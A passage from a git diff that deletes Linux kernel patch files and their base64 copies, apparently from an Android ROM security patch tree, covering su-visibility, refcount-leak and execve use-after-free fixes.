VhZCgmX19zdV9pbnN0YW5jZXMpOworfQorCitib29sIHN1X3J1bm5pbmcodm9pZCkKK3sKKwlyZXR1cm4gc3VfaW5zdGFuY2VzKCkgPiAwOworfQorCitib29sIHN1X3Zpc2libGUodm9pZCkKK3sKKwl1aWRfdCB1aWQgPSBjdXJyZW50X3VpZCgpOworCWlmIChzdV9ydW5uaW5nKCkpCisJCXJldHVybiB0cnVlOworCWlmICh1aWQgPT0gMCB8fCB1aWQgPT0gMTAwMCkKKwkJcmV0dXJuIHRydWU7CisJcmV0dXJuIGZhbHNlOworfQorCit2b2lkIHN1X2V4ZWModm9pZCkKK3sKKwlhdG9taWNfaW5jKCZfX3N1X2luc3RhbmNlcyk7Cit9CisKK3ZvaWQgc3VfZXhpdCh2b2lkKQoreworCWF0b21pY19kZWMoJl9fc3VfaW5zdGFuY2VzKTsKK30KKwogQVRPTUlDX05PVElGSUVSX0hFQUQobWlncmF0aW9uX25vdGlmaWVyX2hlYWQpOwogCiB2b2lkIHN0YXJ0X2JhbmR3aWR0aF90aW1lcihzdHJ1Y3QgaHJ0aW1lciAqcGVyaW9kX3RpbWVyLCBrdGltZV90IHBlcmlvZCkK
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/LVT-2017-0002/3.10/0002.patch b/Patches/Linux_CVEs/LVT-2017-0002/3.10/0002.patch
deleted file mode 100644
index 37fda035..00000000
--- a/Patches/Linux_CVEs/LVT-2017-0002/3.10/0002.patch
+++ /dev/null
@@ -1,24 +0,0 @@
-From fd494b5a4da5dc2e332b8b7480960509046c7b2e Mon Sep 17 00:00:00 2001
-From: Tom Marshall <tdm.code@gmail.com>
-Date: Fri, 19 May 2017 18:24:04 +0000
-Subject: [PATCH] kernel: Fix potential refcount leak in su check
-
-Change-Id: I7e1ecb78bfc951bf645a1462988dcd93c4247a9b
----
-
-diff --git a/fs/namei.c b/fs/namei.c
-index a52456c..404b61c 100644
---- a/fs/namei.c
-+++ b/fs/namei.c
-@@ -2003,8 +2003,10 @@
- 	if (!err) {
- 		struct super_block *sb = nd->inode->i_sb;
- 		if (sb->s_flags & MS_RDONLY) {
--			if (d_is_su(nd->path.dentry) && !su_visible())
-+			if (d_is_su(nd->path.dentry) && !su_visible()) {
-+				path_put(&nd->path);
- 				err = -ENOENT;
-+			}
- 		}
- 	}
- 
diff --git a/Patches/Linux_CVEs/LVT-2017-0002/3.10/0002.patch.base64 b/Patches/Linux_CVEs/LVT-2017-0002/3.10/0002.patch.base64
deleted file mode 100644
index a5ef0584..00000000
--- a/Patches/Linux_CVEs/LVT-2017-0002/3.10/0002.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
-RnJvbSBmZDQ5NGI1YTRkYTVkYzJlMzMyYjhiNzQ4MDk2MDUwOTA0NmM3YjJlIE1vbiBTZXAgMTcgMDA6MDA6MDAgMjAwMQpGcm9tOiBUb20gTWFyc2hhbGwgPHRkbS5jb2RlQGdtYWlsLmNvbT4KRGF0ZTogRnJpLCAxOSBNYXkgMjAxNyAxODoyNDowNCArMDAwMApTdWJqZWN0OiBbUEFUQ0hdIGtlcm5lbDogRml4IHBvdGVudGlhbCByZWZjb3VudCBsZWFrIGluIHN1IGNoZWNrCgpDaGFuZ2UtSWQ6IEk3ZTFlY2I3OGJmYzk1MWJmNjQ1YTE0NjI5ODhkY2Q5M2M0MjQ3YTliCi0tLQoKZGlmZiAtLWdpdCBhL2ZzL25hbWVpLmMgYi9mcy9uYW1laS5jCmluZGV4IGE1MjQ1NmMuLjQwNGI2MWMgMTAwNjQ0Ci0tLSBhL2ZzL25hbWVpLmMKKysrIGIvZnMvbmFtZWkuYwpAQCAtMjAwMyw4ICsyMDAzLDEwIEBACiAJaWYgKCFlcnIpIHsKIAkJc3RydWN0IHN1cGVyX2Jsb2NrICpzYiA9IG5kLT5pbm9kZS0+aV9zYjsKIAkJaWYgKHNiLT5zX2ZsYWdzICYgTVNfUkRPTkxZKSB7Ci0JCQlpZiAoZF9pc19zdShuZC0+cGF0aC5kZW50cnkpICYmICFzdV92aXNpYmxlKCkpCisJCQlpZiAoZF9pc19zdShuZC0+cGF0aC5kZW50cnkpICYmICFzdV92aXNpYmxlKCkpIHsKKwkJCQlwYXRoX3B1dCgmbmQtPnBhdGgpOwogCQkJCWVyciA9IC1FTk9FTlQ7CisJCQl9CiAJCX0KIAl9CiAK
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/LVT-2017-0002/3.18/0003.patch b/Patches/Linux_CVEs/LVT-2017-0002/3.18/0003.patch
deleted file mode 100644
index a78a9950..00000000
--- a/Patches/Linux_CVEs/LVT-2017-0002/3.18/0003.patch
+++ /dev/null
@@ -1,24 +0,0 @@
-From 3a4bd3fb9eb3db4ccb8103ba37ea5082836dba36 Mon Sep 17 00:00:00 2001
-From: Tom Marshall <tdm.code@gmail.com>
-Date: Thu, 18 May 2017 23:50:22 +0000
-Subject: [PATCH] kernel: Fix potential refcount leak in su check
-
-Change-Id: I8d2c8bed65a01eb0928308df638a04449a5bd881
----
-
-diff --git a/fs/namei.c b/fs/namei.c
-index e07a2dc..f588830 100644
---- a/fs/namei.c
-+++ b/fs/namei.c
-@@ -2028,8 +2028,10 @@
- 	if (!err) {
- 		struct super_block *sb = nd->inode->i_sb;
- 		if (sb->s_flags & MS_RDONLY) {
--			if (d_is_su(nd->path.dentry) && !su_visible())
-+			if (d_is_su(nd->path.dentry) && !su_visible()) {
-+				path_put(&nd->path);
- 				err = -ENOENT;
-+			}
- 		}
- 	}
- 
diff --git a/Patches/Linux_CVEs/LVT-2017-0002/3.18/0003.patch.base64 b/Patches/Linux_CVEs/LVT-2017-0002/3.18/0003.patch.base64
deleted file mode 100644
index bec6be8b..00000000
--- a/Patches/Linux_CVEs/LVT-2017-0002/3.18/0003.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
-RnJvbSAzYTRiZDNmYjllYjNkYjRjY2I4MTAzYmEzN2VhNTA4MjgzNmRiYTM2IE1vbiBTZXAgMTcgMDA6MDA6MDAgMjAwMQpGcm9tOiBUb20gTWFyc2hhbGwgPHRkbS5jb2RlQGdtYWlsLmNvbT4KRGF0ZTogVGh1LCAxOCBNYXkgMjAxNyAyMzo1MDoyMiArMDAwMApTdWJqZWN0OiBbUEFUQ0hdIGtlcm5lbDogRml4IHBvdGVudGlhbCByZWZjb3VudCBsZWFrIGluIHN1IGNoZWNrCgpDaGFuZ2UtSWQ6IEk4ZDJjOGJlZDY1YTAxZWIwOTI4MzA4ZGY2MzhhMDQ0NDlhNWJkODgxCi0tLQoKZGlmZiAtLWdpdCBhL2ZzL25hbWVpLmMgYi9mcy9uYW1laS5jCmluZGV4IGUwN2EyZGMuLmY1ODg4MzAgMTAwNjQ0Ci0tLSBhL2ZzL25hbWVpLmMKKysrIGIvZnMvbmFtZWkuYwpAQCAtMjAyOCw4ICsyMDI4LDEwIEBACiAJaWYgKCFlcnIpIHsKIAkJc3RydWN0IHN1cGVyX2Jsb2NrICpzYiA9IG5kLT5pbm9kZS0+aV9zYjsKIAkJaWYgKHNiLT5zX2ZsYWdzICYgTVNfUkRPTkxZKSB7Ci0JCQlpZiAoZF9pc19zdShuZC0+cGF0aC5kZW50cnkpICYmICFzdV92aXNpYmxlKCkpCisJCQlpZiAoZF9pc19zdShuZC0+cGF0aC5kZW50cnkpICYmICFzdV92aXNpYmxlKCkpIHsKKwkJCQlwYXRoX3B1dCgmbmQtPnBhdGgpOwogCQkJCWVyciA9IC1FTk9FTlQ7CisJCQl9CiAJCX0KIAl9CiAK
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/LVT-2017-0002/3.4/0001.patch b/Patches/Linux_CVEs/LVT-2017-0002/3.4/0001.patch
deleted file mode 100644
index 7339ec8b..00000000
--- a/Patches/Linux_CVEs/LVT-2017-0002/3.4/0001.patch
+++ /dev/null
@@ -1,24 +0,0 @@
-From 0f29566b5fad388cc4a07402f9651d86f1fe2b45 Mon Sep 17 00:00:00 2001
-From: Tom Marshall <tdm.code@gmail.com>
-Date: Fri, 19 May 2017 18:24:49 +0000
-Subject: [PATCH] kernel: Fix potential refcount leak in su check
-
-Change-Id: I3d241ae805ba708c18bccfd5e5d6cdcc8a5bc1c8
----
-
-diff --git a/fs/namei.c b/fs/namei.c
-index 414fc51..689339e 100644
---- a/fs/namei.c
-+++ b/fs/namei.c
-@@ -1803,8 +1803,10 @@
- 	if (!err) {
- 		struct super_block *sb = nd->inode->i_sb;
- 		if (sb->s_flags & MS_RDONLY) {
--			if (d_is_su(nd->path.dentry) && !su_visible())
-+			if (d_is_su(nd->path.dentry) && !su_visible()) {
-+				path_put(&nd->path);
- 				err = -ENOENT;
-+			}
- 		}
- 	}
- 
diff --git a/Patches/Linux_CVEs/LVT-2017-0002/3.4/0001.patch.base64 b/Patches/Linux_CVEs/LVT-2017-0002/3.4/0001.patch.base64
deleted file mode 100644
index 5f3cf1a0..00000000
--- a/Patches/Linux_CVEs/LVT-2017-0002/3.4/0001.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
-RnJvbSAwZjI5NTY2YjVmYWQzODhjYzRhMDc0MDJmOTY1MWQ4NmYxZmUyYjQ1IE1vbiBTZXAgMTcgMDA6MDA6MDAgMjAwMQpGcm9tOiBUb20gTWFyc2hhbGwgPHRkbS5jb2RlQGdtYWlsLmNvbT4KRGF0ZTogRnJpLCAxOSBNYXkgMjAxNyAxODoyNDo0OSArMDAwMApTdWJqZWN0OiBbUEFUQ0hdIGtlcm5lbDogRml4IHBvdGVudGlhbCByZWZjb3VudCBsZWFrIGluIHN1IGNoZWNrCgpDaGFuZ2UtSWQ6IEkzZDI0MWFlODA1YmE3MDhjMThiY2NmZDVlNWQ2Y2RjYzhhNWJjMWM4Ci0tLQoKZGlmZiAtLWdpdCBhL2ZzL25hbWVpLmMgYi9mcy9uYW1laS5jCmluZGV4IDQxNGZjNTEuLjY4OTMzOWUgMTAwNjQ0Ci0tLSBhL2ZzL25hbWVpLmMKKysrIGIvZnMvbmFtZWkuYwpAQCAtMTgwMyw4ICsxODAzLDEwIEBACiAJaWYgKCFlcnIpIHsKIAkJc3RydWN0IHN1cGVyX2Jsb2NrICpzYiA9IG5kLT5pbm9kZS0+aV9zYjsKIAkJaWYgKHNiLT5zX2ZsYWdzICYgTVNfUkRPTkxZKSB7Ci0JCQlpZiAoZF9pc19zdShuZC0+cGF0aC5kZW50cnkpICYmICFzdV92aXNpYmxlKCkpCisJCQlpZiAoZF9pc19zdShuZC0+cGF0aC5kZW50cnkpICYmICFzdV92aXNpYmxlKCkpIHsKKwkJCQlwYXRoX3B1dCgmbmQtPnBhdGgpOwogCQkJCWVyciA9IC1FTk9FTlQ7CisJCQl9CiAJCX0KIAl9CiAK
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/LVT-2017-0003/3.10/0001.patch b/Patches/Linux_CVEs/LVT-2017-0003/3.10/0001.patch
deleted file mode 100644
index acc38862..00000000
--- a/Patches/Linux_CVEs/LVT-2017-0003/3.10/0001.patch
+++ /dev/null
@@ -1,26 +0,0 @@
-From 984ee30b63ad26f934cb67ef280200fc161583c1 Mon Sep 17 00:00:00 2001
-From: Alberto97 <albertop2197@gmail.com>
-Date: Tue, 23 May 2017 21:47:00 +0200
-Subject: [PATCH] Fix "hide su" patch for 3.10
-
-Without this, "ls system/xbin" returns "ls: system/xbin/su: No such file or directory"
-if root is disabled in Developer Settings.
-This happens because EXT4 uses "readdir" instead of "iterate".
-3.18 kernel, instead, unconditionally goes for the "iterate" way here
-and that explains why I'm not seeing this error there.
-
-Change-Id: I26426683df0fd199a80f053294f352e31754bec5
----
-
-diff --git a/fs/readdir.c b/fs/readdir.c
-index d52d18d..e1b7e19 100644
---- a/fs/readdir.c
-+++ b/fs/readdir.c
-@@ -43,6 +43,7 @@
- 			res = file->f_op->iterate(file, ctx);
- 			file->f_pos = ctx->pos;
- 		} else {
-+			ctx->romnt = (inode->i_sb->s_flags & MS_RDONLY);
- 			res = file->f_op->readdir(file, ctx, ctx->actor);
- 			ctx->pos = file->f_pos;
- 		}
diff --git a/Patches/Linux_CVEs/LVT-2017-0003/3.10/0001.patch.base64 b/Patches/Linux_CVEs/LVT-2017-0003/3.10/0001.patch.base64
deleted file mode 100644
index fdb05285..00000000
--- a/Patches/Linux_CVEs/LVT-2017-0003/3.10/0001.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
-RnJvbSA5ODRlZTMwYjYzYWQyNmY5MzRjYjY3ZWYyODAyMDBmYzE2MTU4M2MxIE1vbiBTZXAgMTcgMDA6MDA6MDAgMjAwMQpGcm9tOiBBbGJlcnRvOTcgPGFsYmVydG9wMjE5N0BnbWFpbC5jb20+CkRhdGU6IFR1ZSwgMjMgTWF5IDIwMTcgMjE6NDc6MDAgKzAyMDAKU3ViamVjdDogW1BBVENIXSBGaXggImhpZGUgc3UiIHBhdGNoIGZvciAzLjEwCgpXaXRob3V0IHRoaXMsICJscyBzeXN0ZW0veGJpbiIgcmV0dXJucyAibHM6IHN5c3RlbS94YmluL3N1OiBObyBzdWNoIGZpbGUgb3IgZGlyZWN0b3J5IgppZiByb290IGlzIGRpc2FibGVkIGluIERldmVsb3BlciBTZXR0aW5ncy4KVGhpcyBoYXBwZW5zIGJlY2F1c2UgRVhUNCB1c2VzICJyZWFkZGlyIiBpbnN0ZWFkIG9mICJpdGVyYXRlIi4KMy4xOCBrZXJuZWwsIGluc3RlYWQsIHVuY29uZGl0aW9uYWxseSBnb2VzIGZvciB0aGUgIml0ZXJhdGUiIHdheSBoZXJlCmFuZCB0aGF0IGV4cGxhaW5zIHdoeSBJJ20gbm90IHNlZWluZyB0aGlzIGVycm9yIHRoZXJlLgoKQ2hhbmdlLUlkOiBJMjY0MjY2ODNkZjBmZDE5OWE4MGYwNTMyOTRmMzUyZTMxNzU0YmVjNQotLS0KCmRpZmYgLS1naXQgYS9mcy9yZWFkZGlyLmMgYi9mcy9yZWFkZGlyLmMKaW5kZXggZDUyZDE4ZC4uZTFiN2UxOSAxMDA2NDQKLS0tIGEvZnMvcmVhZGRpci5jCisrKyBiL2ZzL3JlYWRkaXIuYwpAQCAtNDMsNiArNDMsNyBAQAogCQkJcmVzID0gZmlsZS0+Zl9vcC0+aXRlcmF0ZShmaWxlLCBjdHgpOwogCQkJZmlsZS0+Zl9wb3MgPSBjdHgtPnBvczsKIAkJfSBlbHNlIHsKKwkJCWN0eC0+cm9tbnQgPSAoaW5vZGUtPmlfc2ItPnNfZmxhZ3MgJiBNU19SRE9OTFkpOwogCQkJcmVzID0gZmlsZS0+Zl9vcC0+cmVhZGRpcihmaWxlLCBjdHgsIGN0eC0+YWN0b3IpOwogCQkJY3R4LT5wb3MgPSBmaWxlLT5mX3BvczsKIAkJfQo=
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/LVT-2017-0004/3.10/0002.patch b/Patches/Linux_CVEs/LVT-2017-0004/3.10/0002.patch
deleted file mode 100644
index ec67f66e..00000000
--- a/Patches/Linux_CVEs/LVT-2017-0004/3.10/0002.patch
+++ /dev/null
@@ -1,50 +0,0 @@
-From 9b854303a58e8e0f4d9c40010fc88d5c280706d9 Mon Sep 17 00:00:00 2001
-From: Andrea Arcangeli <andrea@cpushare.com>
-Date: Tue, 25 Jul 2017 22:22:45 +0200
-Subject: [PATCH] fs/exec: fix use after free in execve
-
-"file" can be already freed if bprm->file is NULL after
-search_binary_handler() return. binfmt_script will do exactly that for
-example. If the VM reuses the file after fput run(), this will result in
-a use ater free.
-
-So obtain d_is_su before search_binary_handler() runs.
-
-This should explain this crash:
-
-[25333.009554] Unable to handle kernel NULL pointer dereference at virtual address 00000185
-[..]
-[25333.009918] [2:             am:21861] PC is at do_execve+0x354/0x474
-
-Change-Id: I2a8a814d1c0aa75625be83cb30432cf13f1a0681
-Signed-off-by: Kevin F. Haggerty <haggertk@lineageos.org>
----
-
-diff --git a/fs/exec.c b/fs/exec.c
-index 0ca8cba..c98c680 100644
---- a/fs/exec.c
-+++ b/fs/exec.c
-@@ -1490,6 +1490,7 @@
- 	bool clear_in_exec;
- 	int retval;
- 	const struct cred *cred = current_cred();
-+	bool is_su;
- 
- 	/*
- 	 * We move the actual failure in case of RLIMIT_NPROC excess from
-@@ -1566,11 +1567,14 @@
- 	if (retval < 0)
- 		goto out;
- 
-+	/* search_binary_handler can release file and it may be freed */
-+	is_su = d_is_su(file->f_dentry);
-+
- 	retval = search_binary_handler(bprm);
- 	if (retval < 0)
- 		goto out;
- 
--	if (d_is_su(file->f_dentry) && capable(CAP_SYS_ADMIN)) {
-+	if (is_su && capable(CAP_SYS_ADMIN)) {
- 		current->flags |= PF_SU;
- 		su_exec();
- 	}
diff --git a/Patches/Linux_CVEs/LVT-2017-0004/3.10/0002.patch.base64 b/Patches/Linux_CVEs/LVT-2017-0004/3.10/0002.patch.base64
deleted file mode 100644
index 52b53994..00000000
--- a/Patches/Linux_CVEs/LVT-2017-0004/3.10/0002.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
-RnJvbSA5Yjg1NDMwM2E1OGU4ZTBmNGQ5YzQwMDEwZmM4OGQ1YzI4MDcwNmQ5IE1vbiBTZXAgMTcgMDA6MDA6MDAgMjAwMQpGcm9tOiBBbmRyZWEgQXJjYW5nZWxpIDxhbmRyZWFAY3B1c2hhcmUuY29tPgpEYXRlOiBUdWUsIDI1IEp1bCAyMDE3IDIyOjIyOjQ1ICswMjAwClN1YmplY3Q6IFtQQVRDSF0gZnMvZXhlYzogZml4IHVzZSBhZnRlciBmcmVlIGluIGV4ZWN2ZQoKImZpbGUiIGNhbiBiZSBhbHJlYWR5IGZyZWVkIGlmIGJwcm0tPmZpbGUgaXMgTlVMTCBhZnRlcgpzZWFyY2hfYmluYXJ5X2hhbmRsZXIoKSByZXR1cm4uIGJpbmZtdF9zY3JpcHQgd2lsbCBkbyBleGFjdGx5IHRoYXQgZm9yCmV4YW1wbGUuIElmIHRoZSBWTSByZXVzZXMgdGhlIGZpbGUgYWZ0ZXIgZnB1dCBydW4oKSwgdGhpcyB3aWxsIHJlc3VsdCBpbgphIHVzZSBhdGVyIGZyZWUuCgpTbyBvYnRhaW4gZF9pc19zdSBiZWZvcmUgc2VhcmNoX2JpbmFyeV9oYW5kbGVyKCkgcnVucy4KClRoaXMgc2hvdWxkIGV4cGxhaW4gdGhpcyBjcmFzaDoKClsyNTMzMy4wMDk1NTRdIFVuYWJsZSB0byBoYW5kbGUga2VybmVsIE5VTEwgcG9pbnRlciBkZXJlZmVyZW5jZSBhdCB2aXJ0dWFsIGFkZHJlc3MgMDAwMDAxODUKWy4uXQpbMjUzMzMuMDA5OTE4XSBbMjogICAgICAgICAgICAgYW06MjE4NjFdIFBDIGlzIGF0IGRvX2V4ZWN2ZSsweDM1NC8weDQ3NAoKQ2hhbmdlLUlkOiBJMmE4YTgxNGQxYzBhYTc1NjI1YmU4M2NiMzA0MzJjZjEzZjFhMDY4MQpTaWduZWQtb2ZmLWJ5OiBLZXZpbiBGLiBIYWdnZXJ0eSA8aGFnZ2VydGtAbGluZWFnZW9zLm9yZz4KLS0tCgpkaWZmIC0tZ2l0IGEvZnMvZXhlYy5jIGIvZnMvZXhlYy5jCmluZGV4IDBjYThjYmEuLmM5OGM2ODAgMTAwNjQ0Ci0tLSBhL2ZzL2V4ZWMuYworKysgYi9mcy9leGVjLmMKQEAgLTE0OTAsNiArMTQ5MCw3IEBACiAJYm9vbCBjbGVhcl9pbl9leGVjOwogCWludCByZXR2YWw7CiAJY29uc3Qgc3RydWN0IGNyZWQgKmNyZWQgPSBjdXJyZW50X2NyZWQoKTsKKwlib29sIGlzX3N1OwogCiAJLyoKIAkgKiBXZSBtb3ZlIHRoZSBhY3R1YWwgZmFpbHVyZSBpbiBjYXNlIG9mIFJMSU1JVF9OUFJPQyBleGNlc3MgZnJvbQpAQCAtMTU2NiwxMSArMTU2NywxNCBAQAogCWlmIChyZXR2YWwgPCAwKQogCQlnb3RvIG91dDsKIAorCS8qIHNlYXJjaF9iaW5hcnlfaGFuZGxlciBjYW4gcmVsZWFzZSBmaWxlIGFuZCBpdCBtYXkgYmUgZnJlZWQgKi8KKwlpc19zdSA9IGRfaXNfc3UoZmlsZS0+Zl9kZW50cnkpOworCiAJcmV0dmFsID0gc2VhcmNoX2JpbmFyeV9oYW5kbGVyKGJwcm0pOwogCWlmIChyZXR2YWwgPCAwKQogCQlnb3RvIG91dDsKIAotCWlmIChkX2lzX3N1KGZpbGUtPmZfZGVudHJ5KSAmJiBjYXBhYmxlKENBUF9TWVNfQURNSU4pKSB7CisJaWYgKGlzX3N1ICYmIGNhcGFibGUoQ0FQX1NZU19BRE1JTikpIHsKIAkJY3VycmVudC0+ZmxhZ3MgfD0gUEZfU1U7CiAJCXN1X2V4ZWMoKTsKIAl9Cg==
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/LVT-2017-0004/3.18/0003.patch b/Patches/Linux_CVEs/LVT-2017-0004/3.18/0003.patch
deleted file mode 100644
index 67b5cbd0..00000000
--- a/Patches/Linux_CVEs/LVT-2017-0004/3.18/0003.patch
+++ /dev/null
@@ -1,50 +0,0 @@
-From 988e4530c2ce74a789c7cba210520d78b9a10132 Mon Sep 17 00:00:00 2001
-From: Andrea Arcangeli <andrea@cpushare.com>
-Date: Tue, 25 Jul 2017 22:22:45 +0200
-Subject: [PATCH] fs/exec: fix use after free in execve
-
-"file" can be already freed if bprm->file is NULL after
-exec_binprm() return. binfmt_script will do exactly that for
-example. If the VM reuses the file after fput run(), this will result in
-a use ater free.
-
-So obtain d_is_su before exec_binprm() runs.
-
-This should explain this crash:
-
-[25333.009554] Unable to handle kernel NULL pointer dereference at virtual address 00000185
-[..]
-[25333.009918] [2:             am:21861] PC is at do_execve+0x354/0x474
-
-Change-Id: I2a8a814d1c0aa75625be83cb30432cf13f1a0681
-Signed-off-by: Kevin F. Haggerty <haggertk@lineageos.org>
----
-
-diff --git a/fs/exec.c b/fs/exec.c
-index 1838704..69b0dbd 100644
---- a/fs/exec.c
-+++ b/fs/exec.c
-@@ -1458,6 +1458,7 @@
- 	struct file *file;
- 	struct files_struct *displaced;
- 	int retval;
-+	bool is_su;
- 
- 	if (IS_ERR(filename))
- 		return PTR_ERR(filename);
-@@ -1533,11 +1534,14 @@
- 	if (retval < 0)
- 		goto out;
- 
-+	/* search_binary_handler can release file and it may be freed */
-+	is_su = d_is_su(file->f_dentry);
-+
- 	retval = exec_binprm(bprm);
- 	if (retval < 0)
- 		goto out;
- 
--	if (d_is_su(file->f_dentry) && capable(CAP_SYS_ADMIN)) {
-+	if (is_su && capable(CAP_SYS_ADMIN)) {
- 		current->flags |= PF_SU;
- 		su_exec();
- 	}
diff --git a/Patches/Linux_CVEs/LVT-2017-0004/3.18/0003.patch.base64 b/Patches/Linux_CVEs/LVT-2017-0004/3.18/0003.patch.base64
deleted file mode 100644
index 90170977..00000000
--- a/Patches/Linux_CVEs/LVT-2017-0004/3.18/0003.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
-RnJvbSA5ODhlNDUzMGMyY2U3NGE3ODljN2NiYTIxMDUyMGQ3OGI5YTEwMTMyIE1vbiBTZXAgMTcgMDA6MDA6MDAgMjAwMQpGcm9tOiBBbmRyZWEgQXJjYW5nZWxpIDxhbmRyZWFAY3B1c2hhcmUuY29tPgpEYXRlOiBUdWUsIDI1IEp1bCAyMDE3IDIyOjIyOjQ1ICswMjAwClN1YmplY3Q6IFtQQVRDSF0gZnMvZXhlYzogZml4IHVzZSBhZnRlciBmcmVlIGluIGV4ZWN2ZQoKImZpbGUiIGNhbiBiZSBhbHJlYWR5IGZyZWVkIGlmIGJwcm0tPmZpbGUgaXMgTlVMTCBhZnRlcgpleGVjX2JpbnBybSgpIHJldHVybi4gYmluZm10X3NjcmlwdCB3aWxsIGRvIGV4YWN0bHkgdGhhdCBmb3IKZXhhbXBsZS4gSWYgdGhlIFZNIHJldXNlcyB0aGUgZmlsZSBhZnRlciBmcHV0IHJ1bigpLCB0aGlzIHdpbGwgcmVzdWx0IGluCmEgdXNlIGF0ZXIgZnJlZS4KClNvIG9idGFpbiBkX2lzX3N1IGJlZm9yZSBleGVjX2JpbnBybSgpIHJ1bnMuCgpUaGlzIHNob3VsZCBleHBsYWluIHRoaXMgY3Jhc2g6CgpbMjUzMzMuMDA5NTU0XSBVbmFibGUgdG8gaGFuZGxlIGtlcm5lbCBOVUxMIHBvaW50ZXIgZGVyZWZlcmVuY2UgYXQgdmlydHVhbCBhZGRyZXNzIDAwMDAwMTg1ClsuLl0KWzI1MzMzLjAwOTkxOF0gWzI6ICAgICAgICAgICAgIGFtOjIxODYxXSBQQyBpcyBhdCBkb19leGVjdmUrMHgzNTQvMHg0NzQKCkNoYW5nZS1JZDogSTJhOGE4MTRkMWMwYWE3NTYyNWJlODNjYjMwNDMyY2YxM2YxYTA2ODEKU2lnbmVkLW9mZi1ieTogS2V2aW4gRi4gSGFnZ2VydHkgPGhhZ2dlcnRrQGxpbmVhZ2Vvcy5vcmc+Ci0tLQoKZGlmZiAtLWdpdCBhL2ZzL2V4ZWMuYyBiL2ZzL2V4ZWMuYwppbmRleCAxODM4NzA0Li42OWIwZGJkIDEwMDY0NAotLS0gYS9mcy9leGVjLmMKKysrIGIvZnMvZXhlYy5jCkBAIC0xNDU4LDYgKzE0NTgsNyBAQAogCXN0cnVjdCBmaWxlICpmaWxlOwogCXN0cnVjdCBmaWxlc19zdHJ1Y3QgKmRpc3BsYWNlZDsKIAlpbnQgcmV0dmFsOworCWJvb2wgaXNfc3U7CiAKIAlpZiAoSVNfRVJSKGZpbGVuYW1lKSkKIAkJcmV0dXJuIFBUUl9FUlIoZmlsZW5hbWUpOwpAQCAtMTUzMywxMSArMTUzNCwxNCBAQAogCWlmIChyZXR2YWwgPCAwKQogCQlnb3RvIG91dDsKIAorCS8qIHNlYXJjaF9iaW5hcnlfaGFuZGxlciBjYW4gcmVsZWFzZSBmaWxlIGFuZCBpdCBtYXkgYmUgZnJlZWQgKi8KKwlpc19zdSA9IGRfaXNfc3UoZmlsZS0+Zl9kZW50cnkpOworCiAJcmV0dmFsID0gZXhlY19iaW5wcm0oYnBybSk7CiAJaWYgKHJldHZhbCA8IDApCiAJCWdvdG8gb3V0OwogCi0JaWYgKGRfaXNfc3UoZmlsZS0+Zl9kZW50cnkpICYmIGNhcGFibGUoQ0FQX1NZU19BRE1JTikpIHsKKwlpZiAoaXNfc3UgJiYgY2FwYWJsZShDQVBfU1lTX0FETUlOKSkgewogCQljdXJyZW50LT5mbGFncyB8PSBQRl9TVTsKIAkJc3VfZXhlYygpOwogCX0K
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/LVT-2017-0004/3.4/0001.patch b/Patches/Linux_CVEs/LVT-2017-0004/3.4/0001.patch
deleted file mode 100644
index 10acfdee..00000000
--- a/Patches/Linux_CVEs/LVT-2017-0004/3.4/0001.patch
+++ /dev/null
@@ -1,50 +0,0 @@
-From be1421e7f5948f7c9f7ff351ec47c19da7498686 Mon Sep 17 00:00:00 2001
-From: Andrea Arcangeli <andrea@cpushare.com>
-Date: Tue, 25 Jul 2017 22:22:45 +0200
-Subject: [PATCH] fs/exec: fix use after free in execve
-
-"file" can be already freed if bprm->file is NULL after
-search_binary_handler() return. binfmt_script will do exactly that for
-example. If the VM reuses the file after fput run(), this will result in
-a use ater free.
-
-So obtain d_is_su before search_binary_handler() runs.
-
-This should explain this crash:
-
-[25333.009554] Unable to handle kernel NULL pointer dereference at virtual address 00000185
-[..]
-[25333.009918] [2:             am:21861] PC is at do_execve+0x354/0x474
-
-Change-Id: I2a8a814d1c0aa75625be83cb30432cf13f1a0681
-Signed-off-by: Kevin F. Haggerty <haggertk@lineageos.org>
----
-
-diff --git a/fs/exec.c b/fs/exec.c
-index 73e9bd4..5d2a2f0 100644
---- a/fs/exec.c
-+++ b/fs/exec.c
-@@ -1511,6 +1511,7 @@
- 	bool clear_in_exec;
- 	int retval;
- 	const struct cred *cred = current_cred();
-+	bool is_su;
- 
- 	/*
- 	 * We move the actual failure in case of RLIMIT_NPROC excess from
-@@ -1587,11 +1588,14 @@
- 	if (retval < 0)
- 		goto out;
- 
-+	/* search_binary_handler can release file and it may be freed */
-+	is_su = d_is_su(file->f_dentry);
-+
- 	retval = search_binary_handler(bprm,regs);
- 	if (retval < 0)
- 		goto out;
- 
--	if (d_is_su(file->f_dentry) && capable(CAP_SYS_ADMIN)) {
-+	if (is_su && capable(CAP_SYS_ADMIN)) {
- 		current->flags |= PF_SU;
- 		su_exec();
- 	}
diff --git a/Patches/Linux_CVEs/LVT-2017-0004/3.4/0001.patch.base64 b/Patches/Linux_CVEs/LVT-2017-0004/3.4/0001.patch.base64
deleted file mode 100644
index 01239c3d..00000000
--- a/Patches/Linux_CVEs/LVT-2017-0004/3.4/0001.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
